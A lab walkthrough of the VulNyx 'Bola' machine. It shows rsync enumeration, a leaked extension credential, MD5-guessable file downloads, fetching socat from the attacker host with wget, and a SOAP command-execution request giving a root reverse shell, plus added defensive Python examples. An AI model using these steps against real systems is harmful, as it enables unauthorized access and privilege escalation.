Vulnyx-Bola-Walkthrough
城南花已开

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.187 08:00:27:1d:c6:76 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:fd:65:82 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.032 seconds (125.98 hosts/sec). 4 responded
export ip=192.168.60.187
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.187:22
Open 192.168.60.187:80
Open 192.168.60.187:873
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 15:48 CST
Initiating ARP Ping Scan at 15:48
Scanning 192.168.60.187 [1 port]
Completed ARP Ping Scan at 15:48, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:48
Completed Parallel DNS resolution of 1 host. at 15:48, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:48
Scanning 192.168.60.187 [3 ports]
Discovered open port 22/tcp on 192.168.60.187
Discovered open port 873/tcp on 192.168.60.187
Discovered open port 80/tcp on 192.168.60.187
Completed SYN Stealth Scan at 15:48, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.187
Host is up, received arp-response (0.00086s latency).
Scanned at 2025-02-16 15:48:05 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
873/tcp open rsync syn-ack ttl 64
MAC Address: 08:00:27:1D:C6:76 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Visit port 80, and edit the hosts file to add the domain name.

sudo vim /etc/hosts
192.168.60.187 bola.nyx

Scan the directories.

❯ feroxbuster -u http://bola.nyx

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://bola.nyx
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 270c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 304c http://bola.nyx/admin => http://bola.nyx/admin/
200 GET 72l 215w 2882c http://bola.nyx/login/login.php
301 GET 9l 28w 309c http://bola.nyx/javascript => http://bola.nyx/javascript/
301 GET 9l 28w 309c http://bola.nyx/admin/pdfs => http://bola.nyx/admin/pdfs/
301 GET 9l 28w 310c http://bola.nyx/admin/icons => http://bola.nyx/admin/icons/
301 GET 9l 28w 316c http://bola.nyx/javascript/jquery => http://bola.nyx/javascript/jquery/
200 GET 10907l 44549w 289782c http://bola.nyx/javascript/jquery/jquery
[####################] - 44s 210025/210025 0s found:9 errors:0
[####################] - 38s 30000/30000 798/s http://bola.nyx/
[####################] - 38s 30000/30000 785/s http://bola.nyx/admin/
[####################] - 43s 30000/30000 705/s http://bola.nyx/javascript/
[####################] - 41s 30000/30000 725/s http://bola.nyx/admin/icons/
[####################] - 42s 30000/30000 714/s http://bola.nyx/admin/pdfs/
[####################] - 42s 30000/30000 720/s http://bola.nyx/login/
[####################] - 40s 30000/30000 752/s http://bola.nyx/javascript/jquery/

We get a login page.

I tried SQL injection without success.

I tried registering a new account and logging in again; it reports that the email or password is invalid.


So we have to try another port.

rsync directory enumeration

There is also port 873, which is mainly used for rsync data synchronization.

873 - Pentesting Rsync - HackTricks

Following the commands from that reference, try to enumerate files that do not require authentication.

Write a script; the module extensions turns out to be readable.

# Try each wordlist entry as an rsync module name and list it without credentials;
# lines containing "error" are filtered out so only readable modules are shown
for i in $(cat /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt); do
  echo "$i"
  rsync -av --list-only "rsync://$ip/$i" 2>&1 | grep -Piv "error"
done
…… omitted ……
extensions
receiving incremental file list
drwxr-xr-x 4,096 2025/02/06 00:43:23 .
-rw-r--r-- 93,553 2025/02/05 23:42:57 Password_manager_FirefoxExtension-VulNyx.pdf
-rw-r--r-- 30,811 2025/02/05 23:31:41 password_manager.zip

sent 20 bytes received 137 bytes 314.00 bytes/sec
total size is 124,364 speedup is 792.13
…… omitted ……

Sync it to the local machine with rsync.

Unzip the archive; there is also a PDF file.

This gives us the source code.

❯ rsync -av rsync://$ip:873/extensions ./rsyn_shared
receiving incremental file list
created directory ./rsyn_shared
./
Password_manager_FirefoxExtension-VulNyx.pdf
password_manager.zip

sent 65 bytes received 124,610 bytes 249,350.00 bytes/sec
total size is 124,364 speedup is 1.00
cd rsyn_shared
❯ x password_manager.zip
extract: extracting to password_manager
Archive: /home/Pepster/vulnyx/rsyn_shared/password_manager.zip
inflating: background.js
inflating: icon.png
inflating: manifest.json
inflating: popup.html
inflating: popup.js
inflating: styles.css

At first I thought it would be something like PDF steganography, but it turned out the password was hidden in the JS code.

It is on line 4 of background.js.

❯ grep -Pnir 'user' .
./password_manager/popup.js:18: <div><strong>Username:</strong> ${entry.username}</div>
./password_manager/popup.js:62: const username = document.getElementById("username").value.trim();
./password_manager/popup.js:65: if (!site || !username || !password) {
./password_manager/popup.js:73: passwords.push({ site, username, password });
./password_manager/popup.html:15: <input type="text" id="username" placeholder="Username" required />
./password_manager/background.js:4: { site: "bola.nyx", username: "[email protected]", password: "sbIJ0x9g{C3`" }

Use these credentials to try logging in to the web application.

Once inside, there is only one file available for download.


After translating it, it turns out to be documentation about WSDL.


Web Services Description Language, but what use is that?

Since it is hinted at, it must be relevant in that direction.

No other information.

Sensitive file disclosure

Scan the directories again with a different wordlist.

This turns up .well-known.

❯ feroxbuster -u http://bola.nyx -w /usr/share/seclists/Discovery/Web-Content/common.txt

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://bola.nyx
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 270c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 49l 70w 1116c http://bola.nyx/.well-known/openid-configuration
200 GET 3l 7w 97c http://bola.nyx/.well-known/security.txt
301 GET 9l 28w 304c http://bola.nyx/admin => http://bola.nyx/admin/
200 GET 71l 180w 1660c http://bola.nyx/index.php
301 GET 9l 28w 309c http://bola.nyx/javascript => http://bola.nyx/javascript/
301 GET 9l 28w 304c http://bola.nyx/login => http://bola.nyx/login/
200 GET 72l 215w 2882c http://bola.nyx/login/login.php
200 GET 71l 180w 1660c http://bola.nyx/
302 GET 0l 0w 0c http://bola.nyx/admin/admin.php => http://bola.nyx/login/login.php
301 GET 9l 28w 310c http://bola.nyx/admin/icons => http://bola.nyx/admin/icons/
301 GET 9l 28w 316c http://bola.nyx/javascript/jquery => http://bola.nyx/javascript/jquery/
200 GET 10907l 44549w 289782c http://bola.nyx/javascript/jquery/jquery
301 GET 9l 28w 309c http://bola.nyx/admin/pdfs => http://bola.nyx/admin/pdfs/
[####################] - 11s 33170/33170 0s found:13 errors:0
[####################] - 5s 4735/4735 925/s http://bola.nyx/
[####################] - 9s 4735/4735 531/s http://bola.nyx/admin/
[####################] - 6s 4735/4735 804/s http://bola.nyx/javascript/
[####################] - 9s 4735/4735 557/s http://bola.nyx/login/
[####################] - 7s 4735/4735 652/s http://bola.nyx/admin/icons/
[####################] - 8s 4735/4735 601/s http://bola.nyx/javascript/jquery/
[####################] - 4s 4735/4735 1070/s http://bola.nyx/admin/pdfs/

curl it: it is an OpenID configuration file containing three usernames: d4t4s3c, jackie0x17 and ct0l4.

❯ curl http://bola.nyx/.well-known/openid-configuration
{
"issuer": "https:\/\/bola.nyx",
"authorization_endpoint": "https:\/\/bola.nyx\/auth",
"token_endpoint": "https:\/\/bola.nyx\/token",
"userinfo_endpoint": "https:\/\/bola.nyx\/userinfo",
"jwks_uri": "https:\/\/bola.nyx\/jwks.json",
"response_types_supported": [
"code",
"token",
"id_token"
],
"grant_types_supported": [
"authorization_code",
"implicit"
],
"subject_types_supported": [
"public"
],
"id_token_signing_alg_values_supported": [
"RS256"
],
"scopes_supported": [
"openid",
"profile",
"email"
],
"claims_supported": [
"sub",
"name",
"email"
],
"userinfo": [
{
"sub": "d4t4s3c",
"name": "d4t4s3c",
"email": "[email protected]"
},
{
"sub": "jackie0x17",
"name": "jackie0x17",
"email": "[email protected]"
},
{
"sub": "ct0l4",
"name": "ct0l4",
"email": "[email protected]"
}
]
}%

At this point I originally thought I could just brute-force SSH with hydra.

After that failed, I was stuck.


But later I noticed the file name is 32 characters long, so I guessed it was the MD5 hash of one of the usernames.

Verify it.

echo -n "115a2cf084dd7e70a91187f799a7d5a8"|wc -c
32
echo -n 'jackie0x17'|md5sum
115a2cf084dd7e70a91187f799a7d5a8 -

Guess that the other users may also have PDF files.

echo -n 'd4t4s3c'|md5sum
97035ded598faa2ce8ff63f7f9dd3b70 -
echo -n 'ct0l4'|md5sum
4a8f81d01d65d3468955191045816c85 -

Modify the link.

http://bola.nyx/download.php?file_name=97035ded598faa2ce8ff63f7f9dd3b70.pdf

We get the file named after the MD5 of d4t4s3c.

From it we get a user credential: VulNyxtestinglogin123
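The predictable file name is the broken object-level authorization the box is named after: any logged-in user can fetch another user's PDF just by hashing a username. The following Python is an added example, not code from the original post or from the VulNyx machine; it reproduces the md5(username).pdf naming the write-up infers and sets a hardened download check beside it that ties each file to its owner instead of trusting the name. The owner table and the authorize_download function are assumed designs.

```python
import hashlib
import re

# Usernames disclosed by the openid-configuration above.
USERS = ["d4t4s3c", "jackie0x17", "ct0l4"]


def report_name(username):
    """Derive the PDF name the way the write-up infers the site does: md5(username).pdf."""
    return hashlib.md5(username.encode()).hexdigest() + ".pdf"


def predictable_names(users):
    """Every user's report name follows from public data alone: that is the BOLA."""
    return {u: report_name(u) for u in users}


# Hardened check (assumed design): authorization comes from an ownership table the
# server controls, never from whether the client managed to guess a name.
_SAFE_NAME = re.compile(r"[0-9a-f]{32}\.pdf")


def authorize_download(session_user, requested, owners):
    """True only if the name is well-formed, exists, and belongs to the session user."""
    if not _SAFE_NAME.fullmatch(requested):
        return False  # rejects traversal such as ../ and anything outside the scheme
    return owners.get(requested) == session_user
```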


User privilege escalation

Try an SSH connection; it fails, but switching the username works.

Got the user flag.

❯ ssh d4t4s3c@$ip
The authenticity of host '192.168.60.187 (192.168.60.187)' can't be established.
ED25519 key fingerprint is SHA256:q2oJVk8pvyNE1iEAucoSG9iwm1MeIlnMRT7L9fXkqzI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.187' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux bola 6.1.0-30-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.124-1 (2025-01-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 6 09:33:51 2025 from 192.168.1.50
d4t4s3c@bola:~$ cat user.txt
4e62a268197ebd869b7bafe859e35d00

Port forwarding

Gather information again.

Ports 3306 and 9000 are open locally.

d4t4s3c@bola:/tmp$ ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 5 0.0.0.0:873 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 5 127.0.0.1:9000 0.0.0.0:*
tcp LISTEN 0 5 [::]:873 [::]:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*

Use socat to forward port 9000 out.

d4t4s3c@bola:/tmp$ wget 192.168.60.100/socat
--2025-02-16 11:15:27-- http://192.168.60.100/socat
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 473256 (462K) [application/octet-stream]
Saving to: ‘socat’

socat 100%[=======================================================================>] 462.16K --.-KB/s in 0.02s

2025-02-16 11:15:27 (24.8 MB/s) - ‘socat’ saved [473256/473256]

d4t4s3c@bola:/tmp$ chmod +x socat
d4t4s3c@bola:/tmp$ socat TCP-LISTEN:9001,fork TCP4:127.0.0.1:9000&
------------------ separator ------------------
❯ nmap -p 9001 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 17:18 CST
Nmap scan report for bola.nyx (192.168.60.187)
Host is up (0.00054s latency).

PORT STATE SERVICE
9001/tcp open tor-orport
MAC Address: 08:00:27:1D:C6:76 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

Root privilege escalation

Following the documentation found earlier, we access the WSDL.

curl fetches the XML; hand it to GPT.

❯ curl http://bola.nyx:9001/wsdl
<definitions name="VulNyxSOAP"
targetNamespace="http://localhost/wsdl/VulNyxSOAP.wsdl"
xmlns="http://schemas.xmlsoap.org/wsdl/"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:tns="http://localhost/wsdl/VulNyxSOAP.wsdl"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">

<message name="LoginRequest">
<part name="username" element="username"/>
<part name="password" element="password"/>
</message>

<message name="LoginResponse">
<part name="status" type="string"/>
</message>

<message name="ExecuteCommandRequest">
<part name="cmd" element="cmd"/>
</message>

<message name="ExecuteCommandResponse">
<part name="output" element="cmd"/>
</message>

<portType name="VulNyxSOAPPortType">
<operation name="Login">
<input message="tns:LoginRequest"/>
<output message="tns:LoginResponse"/>
</operation>
<operation name="ExecuteCommand">
<input message="tns:ExecuteCommandRequest"/>
<output message="tns:ExecuteCommandResponse"/>
</operation>
</portType>

<binding name="VulNyxSOAPBinding" type="tns:VulNyxSOAPPortType">
<soap:binding style="rpc"
transport="http://schemas.xmlsoap.org/soap/http"/>
<operation name="Login">
<soap:operation soapAction="Login"/>
<input>
<soap:body use="literal"/>
</input>
<output>
<soap:body use="literal"/>
</output>
</operation>
<operation name="ExecuteCommand">
<soap:operation soapAction="ExecuteCommand"/>
<input>
<soap:body use="literal"/>
</input>
<output>
<soap:body use="literal"/>
</output>
</operation>
</binding>

<service name="VulNyxSOAP">
<port binding="tns:VulNyxSOAPBinding" name="VulNyxSOAPPort">
<soap:address location="http://localhost:9000/wsdl/" />
</port>
</service>
</definitions>
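As an added example (not code from the post or from the VulNyx service), the following Python parses a trimmed copy of the WSDL above to inventory the SOAP endpoint, its operations and their input parts, and flags operations whose names hint at command execution for an authorization review; the keyword list and the embedded sample are constructed.

```python
import xml.etree.ElementTree as ET

WSDL_NS = "http://schemas.xmlsoap.org/wsdl/"
SOAP_NS = "http://schemas.xmlsoap.org/wsdl/soap/"

# Constructed, trimmed copy of the WSDL shown above so the example runs offline.
SAMPLE_WSDL = """<definitions name="VulNyxSOAP"
  targetNamespace="http://localhost/wsdl/VulNyxSOAP.wsdl"
  xmlns="http://schemas.xmlsoap.org/wsdl/"
  xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
  xmlns:tns="http://localhost/wsdl/VulNyxSOAP.wsdl">
  <message name="LoginRequest">
    <part name="username" element="username"/>
    <part name="password" element="password"/>
  </message>
  <message name="ExecuteCommandRequest"><part name="cmd" element="cmd"/></message>
  <portType name="VulNyxSOAPPortType">
    <operation name="Login"><input message="tns:LoginRequest"/></operation>
    <operation name="ExecuteCommand"><input message="tns:ExecuteCommandRequest"/></operation>
  </portType>
  <service name="VulNyxSOAP">
    <port binding="tns:VulNyxSOAPBinding" name="VulNyxSOAPPort">
      <soap:address location="http://localhost:9000/wsdl/"/>
    </port>
  </service>
</definitions>"""


def parse_wsdl(text):
    """Return (soap endpoint, {operation name: [input part names]})."""
    root = ET.fromstring(text)
    ns = {"w": WSDL_NS, "s": SOAP_NS}
    # message name -> the names of its parts
    parts = {m.get("name"): [p.get("name") for p in m.findall("w:part", ns)]
             for m in root.findall("w:message", ns)}
    ops = {}
    for op in root.findall("w:portType/w:operation", ns):
        msg = op.find("w:input", ns).get("message").split(":", 1)[-1]  # drop tns:
        ops[op.get("name")] = parts.get(msg, [])
    addr = root.find("w:service/w:port/s:address", ns)
    return (addr.get("location") if addr is not None else None), ops


# Assumed keyword list: matching operations need an explicit authorization review,
# since nothing in the WSDL ties ExecuteCommand to a prior successful Login.
RISKY = ("exec", "command", "cmd", "shell", "run")


def risky_operations(ops):
    """Names of operations whose name or inputs hint at command execution."""
    return sorted(name for name, ins in ops.items()
                  if any(k in (name + " " + " ".join(ins)).lower() for k in RISKY))
```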

Command execution

The interface definition reveals an operation that executes commands.

Apifox can import the WSDL data.

Pass the parameters by POSTing the XML body.

It suddenly turned into a development testing environment, hahaha 🤣


Test whether it executes.

<?xml version='1.0' encoding='UTF-8'?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:tns="http://localhost/wsdl">
<soapenv:Body>
<tns:ExecuteCommand>
<tns:cmd>
id
</tns:cmd>
</tns:ExecuteCommand>
</soapenv:Body>
</soapenv:Envelope>

It runs as root.


Pop a reverse shell and listen on a port.

Done. Running cat root/root.txt directly from there would also work, and faster.

But I prefer getting a root shell.

❯ pwncat-cs -lp 4444
[18:54:45] Welcome to pwncat 🐈! __main__.py:164
[18:55:03] received connection from 192.168.60.187:46106 bind.py:84
[18:55:03] 0.0.0.0:4444: normalizing shell path manager.py:957
0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[18:55:04] 192.168.60.187:46106: registered new host w/ db manager.py:957
(local) pwncat$
(remote) root@bola:/root/projects/wsdl_server# cat /root/root.txt
8930fba2c5f4da4e76ceb626f8f5454a
(remote) root@bola:/root/projects/wsdl_server# id
uid=0(root) gid=0(root) groups=0(root)
